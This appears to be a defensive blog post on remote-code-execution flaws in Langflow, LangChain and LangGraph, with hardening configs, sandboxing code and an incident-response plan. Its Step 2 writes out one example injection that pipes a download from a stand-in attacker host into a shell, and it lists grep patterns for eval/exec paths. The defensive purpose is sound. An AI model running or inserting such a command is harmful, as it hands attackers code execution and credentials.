Langflow, LangChain, LangGraph: The Same RCE Hole

Your AI agent is doing exactly what you told it to. Meanwhile, the framework you wrapped it in just gave a random scanner on the internet a shell on the same box that holds your OpenAI key, your Postgres password, and the OAuth tokens for your client's CRM. If you ship agents on Langflow, LangChain, or LangGraph and you have not patched in the last 90 days, assume you are exposed until you prove otherwise.
This is not theoretical. In 2025, three of the most-deployed agent frameworks each shipped a vulnerability that turns "the agent did what it was supposed to do" into remote code execution. Below is what actually happened, what is exposed on the internet right now, and the concrete steps a solo builder or small SMB ops team can take this afternoon to stop being the soft target.
What is actually broken right now
The short version: agent frameworks accept code-shaped inputs (Python expressions, prompt templates, tool definitions, graph configs) and then evaluate them in the same process as your secrets. When those inputs reach the eval/exec/template engine without isolation, you have RCE — and in 2025 each of the big three frameworks had a version of that bug.
- Langflow CVE-2025-3248: an unauthenticated RCE in the /api/v1/validate/code endpoint. The endpoint was meant to validate user-supplied component code; it ran it. CISA added it to the Known Exploited Vulnerabilities catalog in May 2025 after confirmed in-the-wild exploitation (CISA KEV entry). Censys and other scanners have repeatedly reported thousands of exposed Langflow instances on the public internet, many still on vulnerable versions months after the patch.
- LangChain CVE-2024-46946 and the PALChain/LLMMathChain family: multiple historic issues where prompt-driven Python expressions were passed to eval() or exec(). LangChain has been patching variations of this class since 2023; the pattern keeps coming back whenever a new chain wraps numexpr, sympy, or a Python REPL tool.
- LangGraph and ecosystem RCEs in 2025: Check Point Research disclosed an attack chain that turned a SQL injection in a LangGraph-adjacent service into code execution by writing attacker-controlled content that the agent later loaded as a "tool" definition. The pattern matters more than the single CVE: any time an agent loads tool code, prompts, or graph configs from a datastore an attacker can write to, the framework executes attacker code on your server (Check Point Research blog).
The common shape across all three: untrusted input → string that looks like code or a template → evaluated in the agent process → RCE next to your secrets.
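To make that shape concrete, here is a minimal sketch of how a "validate the code" step can quietly become "run the code". It illustrates the bug class under simplified assumptions and is not Langflow's actual implementation; UNTRUSTED_SOURCE, validate_by_exec, and validate_by_parse are hypothetical names. The key fact is that executing a Python def statement evaluates its default arguments and decorators immediately, even if the function is never called.

```python
import ast

# Records what the "attacker" expression managed to do (a harmless stand-in for a shell).
side_effects = []

# Hypothetical user-supplied component code: the default argument is an expression.
UNTRUSTED_SOURCE = (
    "def component(x=record('default argument evaluated')):\n"
    "    return x\n"
)


def validate_by_exec(source: str) -> None:
    """Risky pattern: defining the function already runs its default-argument expressions."""
    namespace = {"record": side_effects.append}
    exec(compile(source, "<untrusted>", "exec"), namespace)


def validate_by_parse(source: str) -> list:
    """Safer pattern: parse to an AST and inspect it; nothing in the source is executed."""
    tree = ast.parse(source)
    return [node.name for node in ast.walk(tree) if isinstance(node, ast.FunctionDef)]
```

Calling validate_by_parse(UNTRUSTED_SOURCE) only reports the function name, while validate_by_exec(UNTRUSTED_SOURCE) appends to side_effects without component ever being called. Swap the harmless record call for an import of os and you have the RCE shape described above.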
Why "we patched it" is not the fix
A patch closes one CVE. It does not close the class. According to Veracode's 2024 State of Software Security report, injection-class flaws have been in the OWASP Top 10 for over a decade and median time to remediation across the industry is measured in months, not days (Veracode SOSS). That gap matters more for agent frameworks than for typical web apps, because:
- The blast radius is bigger. Your agent process holds API keys for OpenAI/Anthropic, database credentials, S3 keys, CRM OAuth tokens, sometimes Stripe keys. One RCE leaks the whole wallet.
- The attack surface is non-obvious. A new tool, a new chain, a new prompt template, a new MCP server: each can re-introduce an eval path you did not know was there.
- Scanners find you fast. Langflow's default port and fingerprint are well-known. Once a CVE drops, mass scanning starts within hours. Shadowserver and similar projects routinely publish dashboards showing tens of thousands of exposed instances of popular dev tools.
If you only update the framework, you are betting that the next eval-shaped bug ships after you next deploy. The real fix is structural: assume the agent process will get popped, and make that boring.
The threat model in one table
Before we talk fixes, get clear on what an attacker actually wants from your agent box. In order of value:
| Asset on the agent host | What an attacker does with it | Typical blast radius |
|---|---|---|
| OPENAI_API_KEY / Anthropic key | Drain credit, run their own workloads on your bill | $100–$10,000 in days |
| Database URL with write creds | Exfiltrate customer data, ransom, or pivot | Full data breach |
| CRM/Gmail/Slack OAuth tokens | Send phishing as you, read DMs, pivot to clients | Reputational + downstream |
| Cloud metadata service (IMDS) | Steal instance role, pivot to S3/RDS/whole account | Full cloud account |
| SSH keys / .git-credentials | Pivot to source repos, supply-chain attack | Long-term persistence |
Notice that the LLM itself is not on the list. Attackers do not care about your prompts. They care about the keys sitting next to them.
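A quick way to see your own version of that table is to list which environment variables in the agent process look like credentials. The sketch below is a rough heuristic, not a complete secret scanner: the name pattern and the function secret_like_env_names are assumptions for illustration, and it reports names only, never values.

```python
import os
import re
from typing import Mapping, Optional

# Heuristic, illustrative pattern: variable names that usually hold credentials.
SECRET_NAME_PATTERN = re.compile(
    r"(KEY|TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL|DATABASE_URL)", re.IGNORECASE
)


def secret_like_env_names(environ: Optional[Mapping[str, str]] = None) -> list:
    """Return sorted names of variables that look like secrets (values are never returned)."""
    env = os.environ if environ is None else environ
    return sorted(name for name in env if SECRET_NAME_PATTERN.search(name))


if __name__ == "__main__":
    # Run this inside the agent container: every name printed is readable after an RCE.
    for name in secret_like_env_names():
        print(name)
```

If the list is longer than one short-lived broker token, the agent process is holding more than it needs.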
Step 1: stop running the agent on the same host as the secrets
This is the single highest-leverage change. The Langflow CVE is bad because Langflow runs on a host that also has the OpenAI key in an env var. Separate them.
A minimal pattern that works for a solo builder:
# docker-compose.yml: agent runs as a non-root user in a network-restricted container
services:
  agent:
    image: your-agent:latest
    user: "10001:10001"
    read_only: true
    tmpfs:
      - /tmp:size=64M
    cap_drop: [ALL]
    security_opt:
      - no-new-privileges:true
    environment:
      # NOT the real keys: a short-lived token to a secrets broker
      VAULT_TOKEN: ${VAULT_AGENT_TOKEN}
    networks: [agent_net]
  secrets_broker:
    image: your-broker:latest
    # Only this service can reach Vault / AWS Secrets Manager
    networks: [agent_net, secrets_net]
networks:
  agent_net:
    internal: true  # no internet egress except through proxy
  secrets_net:
    internal: true
Three things this buys you:
- read_only: true + tmpfs means an RCE cannot write a persistent backdoor.
- cap_drop: [ALL] and no-new-privileges kill most kernel-level escalation paths.
- internal: true on the network blocks the IMDS endpoint (169.254.169.254) and arbitrary outbound, so a popped agent cannot exfiltrate to attacker.com or steal the EC2 instance role.
If you are on Kubernetes, the equivalent is runAsNonRoot, readOnlyRootFilesystem, seccompProfile: RuntimeDefault, and a NetworkPolicy that allows egress only to the LLM provider and your DB. The Kubernetes Pod Security Standards "restricted" profile gives you most of this out of the box.
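These container settings are easy to drift away from, so it can help to check them mechanically in CI. The sketch below assumes you have already parsed the compose file into a dictionary (for example with a YAML library) and pass in one service mapping; hardening_gaps is a hypothetical helper, and it only covers the four settings discussed above.

```python
def hardening_gaps(service: dict) -> list:
    """Return human-readable gaps for one compose service mapping (empty list = all present)."""
    gaps = []

    if service.get("read_only") is not True:
        gaps.append("read_only is not true")

    cap_drop = [str(cap).upper() for cap in service.get("cap_drop", [])]
    if "ALL" not in cap_drop:
        gaps.append("cap_drop does not include ALL")

    security_opt = [str(opt).replace(" ", "") for opt in service.get("security_opt", [])]
    if "no-new-privileges:true" not in security_opt:
        gaps.append("security_opt lacks no-new-privileges:true")

    # "user" may be "uid" or "uid:gid"; unset, "0", or "root" all mean root.
    uid = str(service.get("user", "")).split(":")[0]
    if uid in ("", "0", "root"):
        gaps.append("container runs as root or user is unset")

    return gaps
```

Feeding it the agent service from the compose file above returns an empty list; a bare service with only an image key returns all four gaps.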
Step 2: kill every eval path you do not need
Most teams using LangChain do not need PALChain, LLMMathChain, the Python REPL tool, or any chain that constructs code from prompts. If you are not using them, remove them. If you are, replace them.
A blunt audit script that catches the common ones:
# Find dangerous imports in your codebase
rg -n --type py 'PALChain|LLMMathChain|PythonREPL|PythonAstREPL|exec\(|eval\(' .
# Find expression evaluators that prompt-generated text could reach
rg -n --type py 'numexpr|sympy.*sympify|compile\(' .
# Find tool definitions that take arbitrary code as a string arg
rg -n --type py 'Tool\(.*func=.*exec' .
For math, replace LLMMathChain with a strict parser like asteval (which whitelists nodes) or run the calculation in a separate, network-less Docker container with a 5-second timeout. The pattern:
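# Instead of LLMMathChain (which has hit eval-class CVEs)
import subprocess

# Assumption: "your-math-sandbox:latest" is an image you build from
# python:3.12-slim with asteval pre-installed. The stock image does not ship
# asteval, and --network=none rules out installing it at run time.
SANDBOX_IMAGE = "your-math-sandbox:latest"

# The expression arrives as sys.argv[1], so it is never spliced into source code.
EVAL_SNIPPET = "import sys; from asteval import Interpreter; print(Interpreter()(sys.argv[1]))"

def safe_math(expression: str) -> str:
    # Run in a throwaway container with no network, no mounts, 5s timeout.
    # subprocess.TimeoutExpired propagates to the caller if the limit is hit.
    result = subprocess.run(
        ["docker", "run", "--rm", "--network=none",
         "--memory=128m", "--cpus=0.5",
         SANDBOX_IMAGE, "python", "-c", EVAL_SNIPPET, expression],
        capture_output=True, timeout=5, text=True,
    )
    return result.stdout.strip()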
It is more code. It is also the difference between "the model wrote a weird expression" and "the model wrote __import__('os').system('curl attacker.com | sh')".
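If a container per calculation is too heavy, the node-whitelisting idea can also be sketched with only the standard library. This is a minimal illustration of the technique, not asteval's implementation: eval_arithmetic and its limits (MAX_LENGTH, MAX_EXPONENT) are assumptions chosen for the example, and it accepts nothing but numeric literals and basic arithmetic operators.

```python
import ast
import operator
from typing import Union

Number = Union[int, float]

# Only these operators are permitted; every other AST node type is rejected.
_BINARY_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.Mod: operator.mod, ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}

MAX_LENGTH = 200    # illustrative cap on input size
MAX_EXPONENT = 64   # illustrative cap to avoid huge-number CPU and memory abuse


def eval_arithmetic(expression: str) -> Number:
    """Evaluate plain arithmetic; raise ValueError for anything outside the whitelist."""
    if len(expression) > MAX_LENGTH:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expression, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    return _eval_node(tree.body)


def _eval_node(node: ast.AST) -> Number:
    # Numeric literals only (bool is excluded because type(True) is bool, not int).
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
            raise ValueError("exponent too large")
        return _BINARY_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError(f"disallowed syntax: {type(node).__name__}")
```

Names, attribute access, and function calls never reach an evaluator here, so an expression such as the __import__ one-liner above fails with ValueError instead of running. Division by zero still raises ZeroDivisionError, which the caller should handle.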
Step 3: treat MCP servers and tools as untrusted code
Model Context Protocol is great. It is also a new RCE surface. Every MCP server you connect to is, by definition, code that can be invoked by your agent's reasoning. Three rules I apply on every client deployment:
- Pin and review. Pin MCP servers by commit SHA or signed image digest, not latest. Read the source before adding a community server. If you would not curl | bash it, do not connect it.
- One MCP server, one sandbox. Run each MCP server in its own container with its own credentials. The filesystem MCP server gets read access to one directory. The GitHub MCP server gets a fine-grained PAT scoped to one repo. If one gets popped, the rest do not fall.
- Log every tool call. Structured logs of (timestamp, tool_name, args_hash, result_hash) make incident response possible. Without them, "did the agent exfiltrate the customer table?" is unanswerable.
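The logging rule can be sketched as a thin wrapper around whatever function actually invokes the tool. This is a sketch under stated assumptions: call_tool_logged and the sink parameter are hypothetical names, the hashes are SHA-256 over a sorted JSON rendering, and the extra ok field is my addition so failed calls are visible too.

```python
import hashlib
import json
import time
from typing import Any, Callable


def _digest(value: Any) -> str:
    """SHA-256 of a stable JSON rendering, so raw arguments never land in the log."""
    payload = json.dumps(value, sort_keys=True, default=repr).encode("utf-8")
    return hashlib.sha256(payload).hexdigest()


def call_tool_logged(
    tool_name: str,
    func: Callable[..., Any],
    args: dict,
    sink: Callable[[str], None] = print,
) -> Any:
    """Invoke func(**args) and emit one JSON log line, even when the tool raises."""
    record = {
        "timestamp": time.time(),
        "tool_name": tool_name,
        "args_hash": _digest(args),
    }
    try:
        result = func(**args)
    except Exception as exc:
        record["result_hash"] = _digest(repr(exc))
        record["ok"] = False
        sink(json.dumps(record))
        raise
    record["result_hash"] = _digest(result)
    record["ok"] = True
    sink(json.dumps(record))
    return result
```

Hashing keeps customer data out of the log while still letting you prove, during an incident, whether two calls carried the same arguments. If you need the raw values for forensics, store them separately with tighter access.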
A reasonable boundary config:
{
  "mcp_servers": {
    "github": {
      "image": "ghcr.io/example/mcp-github@sha256:abc123...",
      "env": { "GITHUB_TOKEN": "${SCOPED_REPO_PAT}" },
      "network": "egress_github_only",
      "readonly_root": true
    },
    "fs": {
      "image": "ghcr.io/example/mcp-fs@sha256:def456...",
      "mounts": [{ "src": "/workdir/project-a", "dst": "/data", "ro": true }],
      "network": "none"
    }
  }
}
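The "pin by digest" rule is simple to enforce before deployment. The sketch below assumes the config has the shape shown above (an mcp_servers mapping whose entries carry an image string); that shape and the helper unpinned_images are illustrative, not part of any MCP specification. Note that truncated placeholder digests like the ones in the example would be reported as unpinned until replaced with full 64-character values.

```python
import re

# An image reference counts as pinned only if it ends in a full sha256 digest.
DIGEST_PINNED = re.compile(r"^[^\s@]+@sha256:[0-9a-f]{64}$")


def unpinned_images(config: dict) -> list:
    """Return sorted names of MCP servers whose image is not pinned by digest."""
    servers = config.get("mcp_servers", {})
    return sorted(
        name
        for name, spec in servers.items()
        if not DIGEST_PINNED.match(str(spec.get("image", "")))
    )
```

Failing the deploy when this list is non-empty turns the rule from a habit into a gate.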
Step 4: lock down the framework's admin surface
The Langflow RCE was reachable because the visual builder UI was exposed to the internet with no auth. Do not do that.
Concrete checklist for any agent framework UI (Langflow, LangGraph Studio, Flowise, n8n, Dify, anything with a graph editor):
- Bind to localhost or a private subnet. If you need remote access, put it behind a VPN (Tailscale, WireGuard, AWS SSM) or an authenticating reverse proxy (Cloudflare Access, oauth2-proxy). Not just basic auth.
- No public IP on dev environments. Most popped Langflow boxes were dev instances someone forgot about.
- Disable code-validation endpoints in production. If your prod agent never edits its own graph, the endpoints that allow editing should return 404. Many frameworks have a READ_ONLY or PRODUCTION_MODE flag; use it.
- Egress filtering on the agent host. Allow api.openai.com, api.anthropic.com, your DB host. Deny everything else by default. A popped agent that cannot reach the internet is mostly a contained incident.
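Egress filtering belongs at the network layer (firewall, proxy, NetworkPolicy), but the same allowlist can be mirrored inside the agent as a second line of defense for tools that fetch URLs. The sketch below is an application-level check only; is_egress_allowed and the ALLOWED_HOSTS set are illustrative, and the host list would need your own DB or API hosts added.

```python
from urllib.parse import urlsplit

# Illustrative allowlist taken from the checklist above; extend it with your own hosts.
ALLOWED_HOSTS = frozenset({"api.openai.com", "api.anthropic.com"})


def is_egress_allowed(url: str, allowed_hosts: frozenset = ALLOWED_HOSTS) -> bool:
    """Allow only https URLs whose exact hostname is on the allowlist (deny by default)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # malformed URL, for example a broken IPv6 literal
    if parts.scheme != "https":
        return False
    # Exact match on the parsed hostname, so look-alike suffixes and
    # userinfo tricks (user@host) do not slip through.
    host = (parts.hostname or "").lower().rstrip(".")
    return host in allowed_hosts
```

Matching on the parsed hostname rather than a substring is the important design choice: a substring check would happily accept api.openai.com.attacker.com.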
Step 5: have a "we got popped" plan before you need it
Assume one of these CVEs catches you next quarter. What happens in the first hour?
A minimal incident plan I run with every client who deploys agents:
# 1. Rotate everything the agent process could see
# (have these scripted in advance — under pressure you will forget one)
./scripts/rotate-openai-key.sh
./scripts/rotate-anthropic-key.sh
./scripts/rotate-db-password.sh
./scripts/revoke-oauth-tokens.sh # CRM, Gmail, Slack, GitHub
# 2. Snapshot the host for forensics, then destroy it
aws ec2 create-snapshot --volume-id vol-xxx --description "ir-$(date +%s)"
terraform destroy -target=module.agent_host && terraform apply
# 3. Diff outbound logs for the last 30 days
# (you do have VPC flow logs or equivalent, right?)
./scripts/flow-log-diff.sh --since "30 days ago" --exclude-known-egress
The point is not the specific commands. The point is that "rotate the OpenAI key" should be one command, not a 40-minute hunt through three dashboards while your bill ticks upward. According to the IBM 2024 Cost of a Data Breach report, organizations that used security AI and automation extensively averaged $2.22M lower breach costs than those that did not (IBM report). For a solo operator, the same logic compresses: a 10-minute rotation versus a 10-hour one is the difference between a non-event and a real incident.
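The flow-log step is the one people tend to leave unscripted, so here is a minimal sketch of the comparison it performs. It assumes the logs have already been parsed into dictionaries with dst and bytes keys; that record shape and the function unexpected_egress are hypothetical, and real VPC flow logs need a parsing step first.

```python
from collections import Counter
from typing import Iterable


def unexpected_egress(records: Iterable[dict], known_destinations: set) -> list:
    """Sum bytes sent to destinations outside the known set, largest first."""
    totals = Counter()
    for record in records:
        dst = record["dst"]
        if dst not in known_destinations:
            totals[dst] += int(record.get("bytes", 0))
    # Largest transfers first: bulk exfiltration tends to surface at the top.
    return sorted(totals.items(), key=lambda item: item[1], reverse=True)
```

An empty result over the 30-day window is the evidence you want for "nothing left the box". Anything at the top of the list is where the investigation starts.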
What about LangChain and LangGraph specifically?
A practical posture for each, as of late 2025:
- LangChain. Treat it like any large surface-area library: pin versions, subscribe to GitHub security advisories, and avoid the historically risky chains (PALChain, LLMMathChain, anything taking raw code from prompts). The maintainers have been responsive on the security side, but the framework's design (composing chains from many community-contributed pieces) means new injection paths will keep appearing. Audit your dependency tree quarterly.
- LangGraph. The graph-of-tools model is cleaner than chain composition, but the same rule applies: any node that loads its config or its tool definitions from a datastore is an injection target. Treat the graph definition as code (review in PRs, sign deployments) rather than as data (loaded from a DB the support team can edit).
- Langflow. Useful for prototyping. I would not run the visual builder on a production host. Export the flow, run it as plain Python in a hardened container, and keep the builder on a laptop or behind a VPN.
For all three: read LangChain's security policy and subscribe to the framework's GitHub security advisories. Patches ship; you need to know within hours, not weeks.
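"Pin versions" is checkable in a few lines. The sketch below flags requirement lines that are not pinned with an exact == version. It is a simplified reading of requirements.txt syntax (it skips option lines such as -r or -e and ignores environment markers), and unpinned_requirements is a hypothetical helper rather than a replacement for a real dependency auditor.

```python
import re

# A line counts as pinned only if it is "name==version" (optional extras allowed).
PINNED = re.compile(r"^[A-Za-z0-9._-]+(\[[^\]]+\])?\s*==\s*[^\s;]+")


def unpinned_requirements(text: str) -> list:
    """Return requirement lines that lack an exact == pin, in file order."""
    loose = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line or line.startswith("-"):
            continue  # blank lines and pip options (-r, -e, --index-url) are skipped
        if not PINNED.match(line):
            loose.append(line)
    return loose
```

Run it against requirements.txt in CI and fail the build when the list is non-empty; an exact pin is what makes "which version was deployed when the CVE dropped?" answerable.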
How BizFlowAI approaches this
Most of the agent work we ship for SMB clients looks the same on day one: their existing prototype runs on a single VM with the OpenAI key in a .env next to a Flowise or Langflow UI exposed on a public IP. The first week of any engagement is moving the agent into the container/network pattern above, separating the secrets broker from the agent process, and putting an explicit allowlist on outbound traffic. The agent does the same thing for the business; it just no longer hands an attacker the keys when (not if) the next framework CVE drops.
We also keep an internal checklist that maps every MCP server, tool, and chain in a client's stack to its eval/exec surface and its blast radius if popped. It is not glamorous work — most of it is networking and IAM — but it is what separates an agent deployment that survives a CVE disclosure from one that ends up on a Shadowserver dashboard.
The 30-minute hardening checklist
If you read nothing else, do these today:
- Take any agent framework UI off the public internet. VPN or auth proxy.
- Move secrets out of the agent process. Even a simple sidecar broker beats env vars.
- Run the agent in a read-only container with cap_drop: [ALL] and a deny-by-default egress policy.
- Grep your codebase for eval, exec, PALChain, LLMMathChain, PythonREPL. Remove what you do not need.
- Pin every MCP server by digest. One container per server. Scoped credentials per server.
- Write the three rotation scripts (LLM key, DB, OAuth). Test them once.
- Subscribe to GitHub security advisories for every framework in your requirements.txt.
None of this is exotic. It is the same defense-in-depth that worked for web apps in 2015. The frameworks are new; the bug class is not. Build like you know the next CVE is already in the codebase — because it probably is.
Frequently asked questions
What is CVE-2025-3248 in Langflow?
CVE-2025-3248 is an unauthenticated remote code execution vulnerability in Langflow's /api/v1/validate/code endpoint. The endpoint was intended to validate user-supplied component code but actually executed it, giving any internet attacker shell access on the server. CISA added it to the Known Exploited Vulnerabilities catalog in May 2025 after confirmed in-the-wild exploitation. Thousands of Langflow instances remain exposed on vulnerable versions months after the patch was released.
Why are LangChain, Langflow, and LangGraph vulnerable to RCE?
All three frameworks accept code-shaped inputs like Python expressions, prompt templates, and tool definitions, then evaluate them in the same process that holds API keys and database credentials. When untrusted input reaches eval(), exec(), or a template engine without isolation, attackers get remote code execution next to your secrets. LangChain's PALChain and LLMMathChain have repeatedly hit eval-class CVEs, and LangGraph has been hit by attack chains that load attacker-controlled tool definitions. The common pattern is untrusted input becoming executable code in the agent process.
How do I secure an AI agent against framework RCE vulnerabilities?
Run the agent in a separate container from your secrets, using read_only filesystems, cap_drop ALL, no-new-privileges, and an internal network that blocks the cloud metadata endpoint (169.254.169.254). Use a secrets broker so the agent only holds short-lived tokens, not raw API keys. Remove every eval path you do not need, including PALChain, LLMMathChain, and PythonREPL tools. Treat MCP servers as untrusted code and sandbox each one with minimal credentials.
What should I use instead of LangChain's LLMMathChain?
Replace LLMMathChain with a strict expression parser like asteval, which whitelists allowed AST nodes, or run calculations in a throwaway Docker container with --network=none, memory limits, and a short timeout. LLMMathChain has repeatedly been hit with eval-class CVEs because it passes prompt-generated expressions to Python's eval or numexpr. Sandboxing the math execution turns a potential RCE into a contained subprocess that can only return text. This adds code but eliminates the entire attack class.
What does an attacker actually steal from a compromised AI agent server?
Attackers target the credentials sitting next to the LLM, not the prompts themselves. The highest-value assets are OpenAI or Anthropic API keys (used to drain credit), database connection strings with write access (used to exfiltrate or ransom data), OAuth tokens for CRM, Gmail, or Slack (used for phishing and pivoting), cloud instance metadata (used to steal IAM roles), and SSH or git credentials (used for supply-chain attacks). A single RCE on an agent host typically exposes the entire credential wallet.